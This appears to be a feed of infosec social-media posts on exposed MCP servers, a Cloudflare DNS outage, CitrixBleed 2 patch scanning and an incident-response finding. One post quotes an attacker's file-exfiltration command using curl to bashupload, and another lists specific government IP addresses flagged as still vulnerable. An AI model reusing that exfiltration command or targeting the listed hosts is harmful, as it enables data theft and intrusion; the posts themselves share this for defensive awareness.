Exposing the Unseen: Mapping MCP Servers Across the Internet
"We identified a total of 1,862 MCP servers exposed to the internet. From this set, we manually verified a sample of 119. All 119 servers granted access to internal tool listings without authentication."
this is why I keep a very watchful eye on Knostic about AI stuff, they know the tech, the risks, *and* how human behavior will interact with them.
Good new SaaS vendor assessment question I’ve been using…
What is your process for updating your customer facing status page in the event of an incident?
You will learn so much from this, including…
- do they even have a status page
- if they do, do they know how to work it
- if its managed by the engineering side of the house or marketing, which can give you clues as too what is important in their org culture
- how transparent they are willing to be about a topic that actually isn’t all that sensitive in the grand scheme of all the things you could ask about
Here’s the @Cloudflare write-up with a description of what caused the outage. It was caused by an internal error not a BGP hijack, but we already knew that.
https://blog.cloudflare.com/cloudflare-1-1-1-1-incident-on-july-14-2025/
On July 14th, 2025, Cloudflare made a change to our service topologies that caused an outage for 1.1.1.1 on the edge, resulting in downtime for 62 minutes for customers using the 1.1.1.1 public DNS Resolver as well as intermittent degradation of service for Gateway DNS. We’re deeply sorry for this outage. This outage was the result of an internal configuration error and not the result of an attack or a BGP hijack. In this blog post, we’re going to talk about what the failure was, why it occurred, and what we’re doing to make sure this doesn’t happen again.
The Hyperpersonalized AI Slop Silo Machine Is Here
🔗 https://www.404media.co/the-ai-slop-niche-machine-is-here/
New CitrixBleed 2 scan data:
+7000 extra hosts added this round, host list is so large you need to use the raw view to see it.
Next set of data publication likely Friday, a month since the patch became available.
3832 orgs/hosts still unpatched.
Just to clear up some misinfo circulating, a BGP hijack was not the cause of
Cloudflare DNS going down today.
At 21:51 UTC, Cloudflare (AS13335) withdrew both 1.1.1.0/24 and 1.0.0.0/24 for an unknown reason.
I suspect AS4755 was always announcing 1.1.1.0/24, when CF went away, it leaked a bit (i.e. "%2").
https://infosec.exchange/@GossiTheDog@cyberplace.social/114854023690856642
207.218.103.174,*.attorneygeneral.gov|attorneygeneral.gov,13.1-52.19,VULNERABLE
207.218.103.19,*.attorneygeneral.gov|attorneygeneral.gov,13.1-52.19,VULNERABLE
If anybody knows anybody at the USG these are still unpatched today and getting owned still.
During a recent Incident Response case, we observed the threat actor exfiltrating data to the platform bashupload[.]com, which enables easy file uploads via a simple cURL command:
curl bashupload[.]com -T your_file.txt
Notably, Palo Alto highlighted this service in a February report, stating:
"The threat actor stored some of the web shells on bashupload[.]com and downloaded and decoded them using certutil." [1]
Given its use in malicious activity, bashupload[.]com is a domain you may want to consider blocking and/or setting up alerts for any network connections.
[1] https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/
Ian Campbell
Infocalypse Now
myrmepropagandist
Mike Sheward
Doug Madory
404 Media
Kevin Beaumont
Stephan Berger